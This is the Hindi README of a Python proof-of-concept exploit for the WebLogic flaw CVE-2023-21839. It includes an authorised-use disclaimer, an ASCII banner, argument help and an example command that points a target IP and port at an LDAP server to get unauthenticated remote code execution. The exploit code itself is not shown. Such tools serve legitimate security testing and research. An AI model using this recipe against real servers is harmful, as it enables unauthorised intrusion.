
# CVE-2023-21839 के लिए Python प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो LDAP इंजेक्शन के माध्यम से WebLogic सर्वरों को लक्षित करता है, बिना प्रमाणीकरण के रिमोट कोड निष्पादन के लिए।
विशेष आवश्यकता के अनुसार @4ra1n भाई के GO संस्करण को Python में अनुवाद किया गया है, यहाँ धन्यवाद!
यह प्रोग्राम केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए उपयोग किया जाना चाहिए। कृपया साइबर सुरक्षा कानूनों के अनुसार इसका उचित उपयोग करें।
उपयोगकर्ता द्वारा इस उपकरण का उपयोग करके किए गए किसी भी अवैध हमले या अन्य गैरकानूनी कार्यों के लिए लेखक जिम्मेदार नहीं है।
vulhub पुनरुत्पादन: लिंक
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
